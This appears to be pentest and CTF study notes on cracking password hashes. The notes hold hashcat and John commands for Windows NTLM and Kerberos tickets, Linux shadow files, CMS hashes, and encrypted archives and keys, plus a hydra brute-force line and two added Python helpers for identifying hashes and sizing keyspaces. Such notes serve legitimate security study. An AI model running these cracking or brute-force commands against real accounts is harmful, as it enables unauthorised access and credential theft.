Hashes list


  • https://crackstation.net/
  • https://www.tunnelsup.com/hash-analyzer/
  • https://www.samsclass.info/123/proj10/p12-hashcat.htm
  • https://hashcat.net/wiki/doku.php?id=example_hashes
  • https://medium.com/geekculture/hashcat-cheat-sheet-511ce5dd7857
  • https://www.cyberpratibha.com/hashcat-tutorial-for-password-cracking/
  • https://github.com/frizb/Hashcat-Cheatsheet
  • https://meowmeowattack.wordpress.com/2022/10/03/pentest-notes-password-hash-cracking/

Use OneRuleToRuleThemAll

https://github.com/stealthsploit/Optimised-hashcat-Rule

Example of hashes

https://hashcat.net/wiki/doku.php?id=example_hashes

1) Find out which hash algorithm is used

$1$ md5crypt, used in Cisco stuff and older Linux/Unix systems
$2$, $2a$, $2b$, $2x$, $2y$ Bcrypt (Popular for web applications)
$6$ sha512crypt (Default for most Linux/Unix systems)

In /etc/shadow:

victim:$1$Ca5qWtrt$puXRv/CVeVaI1DWx.oM/n.:18235:0:99999:7:::

If the hash starts with $1$, MD5 (md5crypt) is used; if it starts with $2$ or $2a$, Blowfish (bcrypt) is used; if it starts with $5$, SHA-256 (sha256crypt) is used; if it starts with $6$, SHA-512 (sha512crypt) is used.

or use a site like

  • https://www.tunnelsup.com/hash-analyzer/
  • https://hashes.com/en/decrypt/hash

Find the hashcat mode number for a hash type

hashcat -h | grep sha512crypt
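The prefix table above, and the raw-digest guessing that hash-identifier does later in these notes, can be scripted. The following is an added example written for these notes, not code from hashcat, john or hash-identifier: it classifies a password field by its $id$ prefix or by its hex length, maps it to the hashcat mode numbers used on this page, and audits a shadow file for locked accounts and legacy md5crypt entries. The prefix table and the sample shadow lines (the two hashes from the notes plus two constructed locked entries) are the example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Prefix -> (algorithm, hashcat mode). These are the prefixes and mode numbers
# used in the notes on this page; the table is the example's own, not a tool's.
PREFIXED = [
    (re.compile(r"^\$1\$"), "md5crypt", 500),
    (re.compile(r"^\$2[abxy]?\$"), "bcrypt", 3200),
    (re.compile(r"^\$5\$"), "sha256crypt", 7400),
    (re.compile(r"^\$6\$"), "sha512crypt", 1800),
    (re.compile(r"^\$apr1\$"), "apr1 (Apache htpasswd md5)", 1600),
    (re.compile(r"^\$P\$"), "phpass (WordPress)", 400),
    (re.compile(r"^\$S\$"), "Drupal 7", 7900),
]

# Raw hex digests carry no prefix, so only the length is known; several
# algorithms share each length, which is why hash-identifier lists candidates.
RAW_BY_LENGTH = {
    32: [("MD5", 0), ("NTLM", 1000), ("MD4", 900)],
    40: [("SHA-1", 100)],
    64: [("SHA2-256", 1400)],
}


@dataclass
class HashInfo:
    candidates: List[Tuple[str, int]]  # [(algorithm, hashcat_mode), ...]; empty if unknown
    locked: bool = False               # '!' prefix, or no usable hash at all
    legacy: bool = False               # md5crypt, listed in the notes as the older scheme


def classify_hash(field: str) -> HashInfo:
    """Classify one password field from /etc/shadow, .htpasswd or a CMS dump."""
    locked = False
    h = field.strip()
    if h.startswith("!"):          # '!' in front of the hash: account is locked
        locked = True
        h = h.lstrip("!")
    if h in ("", "*", "x"):        # no hash stored: password login is impossible
        return HashInfo(candidates=[], locked=True)
    for pattern, name, mode in PREFIXED:
        if pattern.match(h):
            return HashInfo(candidates=[(name, mode)], locked=locked, legacy=(mode == 500))
    if re.fullmatch(r"[0-9a-fA-F]+", h) and len(h) in RAW_BY_LENGTH:
        return HashInfo(candidates=list(RAW_BY_LENGTH[len(h)]), locked=locked)
    return HashInfo(candidates=[], locked=locked)


def parse_shadow_line(line: str) -> Tuple[str, HashInfo]:
    """Return (username, HashInfo) for one /etc/shadow record (9 colon-separated fields)."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"not a shadow record: {line!r}")
    return fields[0], classify_hash(fields[1])


def audit_shadow(text: str) -> dict:
    """Summarise a shadow file: legacy algorithms, locked accounts, users per hashcat mode."""
    report = {"legacy": [], "locked": [], "unknown": [], "by_mode": {}}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, info = parse_shadow_line(line)
        if info.locked:
            report["locked"].append(user)
        if not info.candidates:
            if not info.locked:
                report["unknown"].append(user)
            continue
        if info.legacy:
            report["legacy"].append(user)
        for _name, mode in info.candidates:
            report["by_mode"].setdefault(mode, []).append(user)
    return report


# Constructed sample: the two hashes from the notes plus a disabled and a locked account.
SAMPLE_SHADOW = """\
root:$6$Ha.d5nGupBm29pYr$yugXSk24ZljLTAZZagtGwpSQhb3F2DOJtnHrvk7HI2ma4GsuioHp8sm3LJiRJpKfIf7lZQ29qgtH17Q/JDpYM/:18576::::::
victim:$1$Ca5qWtrt$puXRv/CVeVaI1DWx.oM/n.:18235:0:99999:7:::
daemon:*:18576:0:99999:7:::
bob:!$6$abcdefgh$constructedlockedhashvalue:18576:0:99999:7:::
"""

if __name__ == "__main__":
    for user, info in (parse_shadow_line(l) for l in SAMPLE_SHADOW.splitlines()):
        print(user, info)
    print(audit_shadow(SAMPLE_SHADOW))
```

A 32-hex-character digest deliberately returns three candidates (MD5, NTLM, MD4 in hashcat's 0/1000/900 modes) rather than one, because the string alone cannot distinguish them; the `legacy` flag is the defender's view of the same table, since md5crypt entries are the ones worth migrating to sha512crypt or bcrypt.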

Crack Windows Authentication Hashes


Crack NT Hash / NTLM

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt ~/Downloads/users.txt


hashcat -m 1000 ~/Downloads/users.txt /usr/share/wordlists/rockyou.txt # NT hashes dumped with mimikatz
/opt/hashcat/hashcat --force -m 1000 -r /opt/hashcat/rules/OneRuleToRuleThemAll.rule alice_ntlm.txt /opt/rockyou/rockyou.txt --outfile alice_ntlm_cracked.txt


hashcat -m 13100 -a 0 hash.txt Pass.txt # TGS tickets from Rubeus / Kerberoast
hashcat -m 5600 ntlmV2.txt rockyou.txt --force


hashcat -m 1000 -a 0 -w 4 --force --opencl-device-types 1,2 -O hash "realuniq.lst" -r OneRuleToRuleThemAll.rule
/opt/hashcat/hashcat -m 5600 hash /opt/rockyou/rockyou.txt -o cracked.txt --force -r /opt/hashcat/rules/OneRuleToRuleThemAll.rule --opencl-device-types 1,2 -O -w 4 -a 0


Crack Linux /etc/shadow hashes


Unshadowing

$ cat localshadow 
root:$6$Ha.d5nGupBm29pYr$yugXSk24ZljLTAZZagtGwpSQhb3F2DOJtnHrvk7HI2ma4GsuioHp8sm3LJiRJpKfIf7lZQ29qgtH17Q/JDpYM/:18576::::::

$ cat localpasswd 
root:x:0:0::/root:/bin/bash

$ unshadow localpasswd localshadow > unshadow

$ cat unshadow 
root:$6$Ha.d5nGupBm29pYr$yugXSk24ZljLTAZZagtGwpSQhb3F2DOJtnHrvk7HI2ma4GsuioHp8sm3LJiRJpKfIf7lZQ29qgtH17Q/JDpYM/:0:0::/root:/bin/bash

Crack Linux hash

cat passwords.txt
$6$ZC4srkt5HufYpAAb$GVDM6arO/qQU.o0kLOZfMLAFGNHXULH5bLlidB455aZkKrMvdB1upyMZZzq

hashcat -m 1800 -a 0 -o cracked.txt --remove passwords.txt /usr/share/wordlists/rockyou.txt
tail -f cracked.txt


hashcat -m 500 -a 0 bob.hash /usr/share/wordlists/rockyou.txt --force # for $1$ (md5crypt) hashes

#Brute force all passwords length 1-8 with possible characters A-Z a-z 0-9
hashcat -m 500 hashes.txt -a 3 ?1?1?1?1?1?1?1?1 --increment -1 ?l?d?u
john unshadow 
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt ~/Downloads/unshadow 

Decrypt a passphrase-protected RSA private key with openssl

openssl rsa -in hype_key -out hype_key_decrypted
Enter pass phrase for hype_key:
writing RSA key

Single Crack Mode


In this mode, John uses only the information provided in the username to work out possible passwords heuristically, by slightly changing the letters and numbers contained within the username.

If we take the username: Markus

Some possible passwords could be:

Markus1, Markus2, Markus3 (etc.)
MArkus, MARkus, MARKus (etc.)

A Note on File Formats in Single Crack Mode

If you're cracking hashes in single crack mode, you need to change the format of the file you feed John so it knows which data to derive candidate words from.

From:

1efee03cdcb96d90ad48ccc7b8666033

To:

mike:1efee03cdcb96d90ad48ccc7b8666033

$ cat hash7.txt 
joker:7bf6d9bb82bed1302f331fc6b816aada

john --single --format=raw-md5 ~/Downloads/hash7.txt

Crack md5


hash-identifier 48bb6e862e54f2a795ffc4e541caed4d
hashcat --help | grep md5 # Find the hash id

hashcat -m 0 48bb6e862e54f2a795ffc4e541caed4d /usr/share/wordlists/rockyou.txt --show

Using hash-buster

/opt/Hash-Buster/hash.py -s a6eb56f80be8a120436d6f1c9b8d87ca


Crack keepass


hashcat -m 13400 keepass.hash /opt/rockyou/rockyou.txt --force
john --wordlist=/opt/rockyou/rockyou.txt dbhash --format=KeePass-opencl

Crack md4


hash-identifier 279412f945939ba78ce0758d3fd83daa

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
hashcat -m 900 -r /usr/share/hashcat/rules/best64.rule 279412f945939ba78ce0758d3fd83daa /usr/share/wordlists/rockyou.txt --show
279412f945939ba78ce0758d3fd83daa:Eternity22

John Custom Rules


Custom rules are defined in /etc/john/john.conf; these rules give you a massive level of granular control over how candidate words are mangled.


Crack Zip Files


Convert the zip file into a hash format that John is able to understand

zip2john secure.zip > secure_hash
Created directory: /home/clobee/.john
ver 1.0 efh 5455 efh 7875 secure.zip/zippy/flag.txt PKZIP Encr: 2b chk, TS_chk, cmplen=38, decmplen=26, crc=849AB5A6
john --wordlist=/usr/share/wordlists/rockyou.txt secure_hash 
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip

Crack RAR Archives


Convert the rar file into a hash format that John is able to understand

rar2john secure.rar > rar_hash
john --wordlist=/usr/share/wordlists/rockyou.txt rar_hash   
unrar e secure.rar

Webdav


john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash

hashcat --force -m 500 -a 0 -o found1.txt --remove hash /opt/rockyou/rockyou.txt

Confluence (Atlassian)


/opt/hashcat/hashcat --force -m 12001 hashes.txt /opt/wordlists/fasttrack.txt

Crack SSH Key Passwords


Using John to crack the SSH private key password of id_rsa files.

$ locate ssh2john
/home/clobee/tmp/ccpentesting/john/run/ssh2john.py
/usr/local/bin/john-jumbo/run/ssh2john.py
/usr/share/john/ssh2john.py

/usr/share/john/ssh2john.py idrsa.id_rsa > idrsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt idrsa.hash

To crack with hashcat, see https://miloserdov.org/?p=5426#6


Crack encrypted gpg files


How to encrypt

$ cat secret.txt 
this is secret

$ gpg --cipher-algo AES-256 --symmetric secret.txt

$ cat secret.txt.gpg 
����*wj\k��M�MQ��fym�r��O�S�<}�W�0%     

How to decrypt

$ gpg secret.txt.gpg 
gpg: WARNING: no command supplied.  Trying to guess what you mean ...
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase
File 'secret.txt' exists. Overwrite? (y/N) y

$ cat secret.txt
this is secret

Crack the passphrase with gpg2john

$ gpg2john secret.txt.gpg > hash                                    

File secret.txt.gpg

john --wordlist=/usr/share/wordlists/rockyou.txt --format=gpg hash

Crack wordpress password


cat ~/Downloads/hash.txt 
$P$984478476IagS59wHZvyQMArzfx58u.
/opt/hashcat/hashcat -m 400 -a 0 '$P$BNMdSXZIJVPFih/nCL/Tm6eT152wQv0' /opt/rockyou/rockyou.txt
hashcat -O -m 400 -a 0 -o ~/Downloads/cracked.txt ~/Downloads/hash.txt /usr/share/wordlists/rockyou.txt
tail -f ~/Downloads/cracked.txt

Crack Drupal password


/opt/hashcat/hashcat -m 7900 -a 0 '$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR' /opt/rockyou/rockyou.txt

Crack SHA-1


hash-identifier cbfdac6008f9cab4083784cbd1874f76618d2a97

Possible Hashes:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
hashcat --help | grep SHA-1 # Find the hash id

hashcat -m 100 cbfdac6008f9cab4083784cbd1874f76618d2a97 /usr/share/wordlists/rockyou.txt --show
cbfdac6008f9cab4083784cbd1874f76618d2a97:###########

Crack SHA2-256


hash-identifier 1C8BFE8F801D79745C4631D09FFF36C82AA37FC4CCE4FC946683D7B336B63032

Possible Hashs:
[+] SHA-256
[+] Haval-256
hashcat --help | grep SHA2-256 # Find the hash id

hashcat -m 1400 1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce4fc946683d7b336b63032 /usr/share/wordlists/rockyou.txt --show
1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce4fc946683d7b336b63032:#######

Crack bcrypt


hashcat --help | grep bcrypt # Find the hash id

# Thanks to THM '****' we know the length of the answer 
hashcat -m 3200 -a 3 hash.txt '?l?l?l?l'
$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom:####

Hashcat mask charsets (attack mode 3, -a 3)

    ?l: lowercase letters (a-z)
    ?u: uppercase letters (A-Z)
    ?d: decimal digits (0-9)
    ?h: lowercase hexadecimal digits (0-9, a-f)
    ?H: uppercase hexadecimal digits (0-9, A-F)
    ?s: basic ASCII symbols (e.g., @)
    ?a: printable ASCII characters (numbers, letters, symbols)
    ?b: every possible byte value, from 0x00 to 0xff
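The charset table above determines how large a mask attack's keyspace is, which is the number that decides whether a brute-force run finishes in minutes or never. As an added example (not part of these notes, and not hashcat code), the script below expands a mask, including custom charsets in the -1 ?l?d?u syntax used earlier on this page, into per-position charset sizes and computes the keyspace, with --increment summing the lengths 1..n. The `seconds_at_rate` helper takes whatever hash rate the caller has measured; no rate is assumed.

```python
import string
from typing import Dict, List, Optional

# Built-in hashcat charsets as listed in the notes (?b is all 256 byte values).
BUILTIN = {
    "l": set(string.ascii_lowercase),
    "u": set(string.ascii_uppercase),
    "d": set(string.digits),
    "h": set("0123456789abcdef"),
    "H": set("0123456789ABCDEF"),
    "s": set(" " + string.punctuation),                                  # 33 symbols incl. space
    "a": set(string.ascii_letters + string.digits + " " + string.punctuation),  # 95 printable
    "b": {chr(i) for i in range(256)},
}


def expand_charset(spec: str, custom: Dict[str, str]) -> set:
    """Expand a charset definition such as '?l?d?u' (the -1 syntax) into a set of
    characters. '??' is a literal question mark; any other character is literal.
    Using sets means overlapping charsets (e.g. ?l?h) are not double counted."""
    chars = set()
    i = 0
    while i < len(spec):
        c = spec[i]
        if c == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                chars.add("?")
            elif key in BUILTIN:
                chars |= BUILTIN[key]
            elif key in custom:
                chars |= expand_charset(custom[key], custom)
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            chars.add(c)
            i += 1
    return chars


def mask_positions(mask: str, custom: Optional[Dict[str, str]] = None) -> List[int]:
    """Charset size at each position of a mask like '?1?1?1?1' or 'pass?d?d'."""
    custom = custom or {}
    sizes = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            sizes.append(len(expand_charset(mask[i:i + 2], custom)))
            i += 2
        else:
            sizes.append(1)      # literal character: exactly one possibility
            i += 1
    return sizes


def mask_keyspace(mask: str, custom: Optional[Dict[str, str]] = None,
                  increment: bool = False) -> int:
    """Candidates hashcat must try: the product of per-position sizes, summed
    over prefix lengths 1..n when --increment is given."""
    sizes = mask_positions(mask, custom)
    lengths = range(1, len(sizes) + 1) if increment else [len(sizes)]
    total = 0
    for n in lengths:
        prod = 1
        for s in sizes[:n]:
            prod *= s
        total += prod
    return total


def seconds_at_rate(keyspace: int, hashes_per_second: float) -> float:
    """Worst-case time to exhaust a keyspace at a cracking speed the caller measured."""
    return keyspace / hashes_per_second


if __name__ == "__main__":
    # The two masks used on this page.
    print("?l?l?l?l:", mask_keyspace("?l?l?l?l"))
    print("-1 ?l?d?u, 8 x ?1 with --increment:",
          mask_keyspace("?1?1?1?1?1?1?1?1", custom={"1": "?l?d?u"}, increment=True))
```

The bcrypt example above (`-a 3 '?l?l?l?l'`) only works because the answer length was known: 26^4 is under half a million candidates, trivial even for a slow hash. The sha512crypt mask with `--increment -1 ?l?d?u` up to 8 characters is about 2.2 x 10^14 candidates, which is why that run is impractical against a slow hash and why an 8-character alphanumeric policy is weak against a fast one.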

Crack SHA-256


hash-identifier F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85

Possible Hashs:
[+] SHA-256
[+] Haval-256
hashcat --help | grep SHA2-256 # Find the hash id

hashcat -m 1400 f09edcb1fcefc6dfb23dc3505a882655ff77375ed8aa2d1c13f640fccc2d0c85 /usr/share/wordlists/rockyou.txt --show
f09edcb1fcefc6dfb23dc3505a882655ff77375ed8aa2d1c13f640fccc2d0c85:#####

Crack sha512crypt


john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Crack hmac-sha1


hash-identifier e5d8870e5bdd26602cab8dbe07a942c8669e56d6

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
hashcat --help | grep 'sha1(' # Find the hash id

110 | sha1($pass.$salt)                                | Raw Hash, Salted and/or Iterated
120 | sha1($salt.$pass)                                | Raw Hash, Salted and/or Iterated
...
hashcat -m 110 e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme -a 3 '?a?a?a?a?a?a?a?a?a?a?a?a' /usr/share/wordlists/rockyou.txt --show

This command took hours and didn’t yield any exploitable result. I then checked the hint on THM, which was: HMAC-SHA1

hashcat --help | grep -i 'hmac-sha1' # Find the hash id

150 | HMAC-SHA1 (key = $pass)                          | Raw Hash, Authenticated
160 | HMAC-SHA1 (key = $salt)                          | Raw Hash, Authenticated
...
# Umbraco cms
hashcat -m 100 admin.sha1 /usr/share/wordlists/rockyou.txt --force
hashcat -m 160 e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme /usr/share/wordlists/rockyou.txt --show
e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme:##########

Active Directory


Crack Group policy password

Can use Get-GPPPassword.ps1 (from PowerSploit)

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ


hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt -O
hashcat -m 13100 -a 0 -w 4 --force --opencl-device-types 1,2 -O hash realhuman_phill.txt -r OneRuleToRuleThemAll.rule 


# Cracking asreproast hash
hashcat -m 18200 hash -a 0 /usr/share/wordlists/rockyou.txt

hashcat -m 18200 dave.hash /opt/rockyou/rockyou.txt -r /opt/hashcat/rules/best64.rule --force

# Cracking kerberoast hash
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

For tickets exported with mimikatz (.kirbi files), use tgsrepcrack.py instead:

python tgsrepcrack.py c:\rockyou.txt c:\ticket.kirbi

Cracking PDF Hashes


Crack with hashcat (slow)

/usr/bin/pdf2john Infrastructure.pdf

# Save only the hash part of the output (from `$pdf$4...` to the end of the line) into pdf.hash
hashcat -a 3 -m 10500 pdf.hash

Crack with PDFcrack

pdfcrack -f Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt

Apache


Cracking .htpasswd passwords (basic auth)

# Format: $apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
john --show hash
john --wordlist=/opt/rockyou/rockyou.txt htpasswd.txt
hashcat -m 1600 hash rockyou.txt --force

Brute force basic auth (htaccess)

hydra -l offsec -P /usr/share/wordlists/rockyou.txt -f 192.168.24.52 http-get